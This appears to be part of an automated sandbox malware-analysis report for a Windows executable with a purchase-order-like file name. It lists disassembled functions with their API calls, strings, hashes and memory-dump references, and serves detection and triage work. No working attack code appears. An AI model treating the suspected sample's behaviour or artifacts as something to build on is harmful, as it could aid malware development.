                                                                                                                                                                                                                          • Instruction ID: 73ba7e37247343007321aa60fc7c63e2173afb66a68b14033088ab5266f46407
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22513A75A00208BFDF10DFA4C988A9D7BB5FF48318F20416AF915EB2D1DB799941CB54
                                                                                                                                                                                                                          Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                                                                                                                                                                                          • Instruction ID: e04ffd14ad056a7bc966bca46badc1a9d7fcc05075aa2412e3ac1a9cf71dfd33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0A772508100AFE701EBB499499EE7778DB61314F60457BE241E21C1D7B849859B3A
                                                                                                                                                                                                                          Function 0040402B Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040B6
                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004040E8
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004040F9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404108
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404117
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040411A
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404129
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 004041A3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040421D
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404226
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,?), ref: 00404239
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404246
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404249
                                                                                                                                                                                                                          • SendMessageA.USER32(00000111,?,00000000), ref: 00404275
                                                                                                                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404289
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: Call$LN$N$open
                                                                                                                                                                                                                          • API String ID: 3615053054-1183721957
                                                                                                                                                                                                                          • Opcode ID: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                                                                                                                                                                                          • Instruction ID: 13510805d6fd3d88b19762a43a0fb8d51a409b78b81c3afae21fa77130ec6155
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A61B4B1A40205BFEB109F61DC45F6A7B69FB44751F10807AFB04BA2D1C7B8A951CF98
                                                                                                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                          • Opcode ID: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                                                                                                                                                                                          • Instruction ID: 162af80c0e370fc685607c2eff3bc6c1c184a7d325dd4572e54487cb40a4b06a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67419B71804249AFCF058FA4CD459AFBBB9FF44310F00812AF551AA1A0C738EA51DFA5
                                                                                                                                                                                                                          Function 00405A46 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405BD9,?,?), ref: 00405A79
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,00421AB0,00000400), ref: 00405A82
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(00421EB0,00421EB0,00000400), ref: 00405A9F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405ABD
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BAD
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                          • API String ID: 222337774-4148678300
                                                                                                                                                                                                                          • Opcode ID: 9bc7e89509a9b3e07b0ba00253ca5b1ea37cec48c9fb0683257193e6eb8683f7
                                                                                                                                                                                                                          • Instruction ID: ba38e0c37d2c4a0677a1b8c3a3e2c5b81f52bfc6e6322859571237bcba2cc6eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bc7e89509a9b3e07b0ba00253ca5b1ea37cec48c9fb0683257193e6eb8683f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5310271A05A19ABD2202B219C49F6B3AACDF45754F14043AFD01B62D2D6BCBD018EBD
                                                                                                                                                                                                                          Function 00405F68 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                                                                                                                                                                                          • CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F69
                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00405FB0
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 00405FA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 589700163-587625735
                                                                                                                                                                                                                          • Opcode ID: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction ID: ae1ae60f73f04b2279d28dd2d3a2e9c8876d1ac92d72727c270a9fd7cf783979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75119451908B932DEB3216254C44BBB7F99CF56760F18047BE9C4722C2D6BC9C429B7D
                                                                                                                                                                                                                          Function 00403F49 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F66
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403F82
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403F8E
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403F9A
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403FAD
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403FBD
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403FD7
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction ID: 69fcdb6fe5d9844d1d3a4f02655feb6370c96159658ebf8fe0858d801e39bc44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A215471904705ABCB219F78DD48F4BBFF8AF01715B048A29F895E22E0D735EA04CB55
                                                                                                                                                                                                                          Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                                                                                                                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3730416702-0
                                                                                                                                                                                                                          • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                                                          • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                                                                                                                                          Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                                                          • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                                                                                                                                          Function 004047E1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047FC
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404804
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0040481E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404830
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404856
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
